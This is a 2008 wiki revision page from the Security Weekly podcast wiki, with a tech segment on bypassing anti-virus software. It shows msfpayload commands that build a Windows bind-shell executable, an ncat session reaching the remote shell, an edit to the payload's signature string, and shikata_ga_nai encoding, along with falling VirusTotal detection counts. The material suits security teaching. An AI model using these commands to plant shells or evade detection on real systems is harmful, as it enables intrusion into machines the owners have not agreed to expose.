Difference between revisions of "Episode125"

From Security Weekly Wiki
Jump to navigationJump to search
Line 17: Line 17:
 
The payload generated above when uploaded to [http://www.virustotal.com Virus Total] only gets detected by 7 out of 36 anti-virus engines.  If we look at the payload with our super 1337 reverse engineering tool (the "strings" command), we can see that we are giving ourselves away:
 
The payload generated above when uploaded to [http://www.virustotal.com Virus Total] only gets detected by 7 out of 36 anti-virus engines.  If we look at the payload with our super 1337 reverse engineering tool (the "strings" command), we can see that we are giving ourselves away:
  
=== "Reverse Engineering The Payload" ===
+
"Reverse Engineering The Payload"
  
 
<pre>
 
<pre>

Revision as of 18:39, 29 September 2008

Tech Segment: Bypassing Anti-Virus Software The Script-Kiddie Way

Pass #1 - Metasploit 3.1-release Payload - Unmodified

msfpayload windows/shell_bind_tcp LPORT=6453 X > payload.exe

The above command produces a windows binary that listens on TCP port 6453 for a remote shell. You can access the remote shell using netcat as follows:

funnyhostname:~ pdc$ ncat 192.168.169.40 6453
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>

The payload generated above when uploaded to Virus Total only gets detected by 7 out of 36 anti-virus engines. If we look at the payload with our super 1337 reverse engineering tool (the "strings" command), we can see that we are giving ourselves away:

"Reverse Engineering The Payload"

bash-3.2# strings payload.exe 
!This program cannot be run in DOS mode.
.text
.rdata
@.data
.bss
.idata
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_bind_tcp
 Length: 317
Options: LPORT=6453

Pass #2 - Metasploit Payload - Changed Version String

Editing msfpayload to change the version string:

 
if (cmd =~ /^x/)
                note =
                        "PaulDotCom's Evil Payload\n" +
                        "Payload: " + payload.refname + "\n" +
                        " Length: " + buf.length.to_s + "\n" +
                        "Options: " + options + "\n"

The payload generated above when uploaded to Virus Total only gets detected by 6 out of 36 anti-virus engines. (Panda anti-virus relied on the Metasploit payload string in the binary).

Pass #3 - Metasploit (svn version as of 9-28-08) Payload Encoded With Shikata Ga Nai

msfencode x86/shikata_ga_nai -i svn-payload.exe -t exe > svn-encode-payload.exe

The payload generated above when uploaded to Virus Total only gets detected by 4 out of 36 anti-virus engines. However, it does not function in my testing, but does show how we can evade anti-virus systems.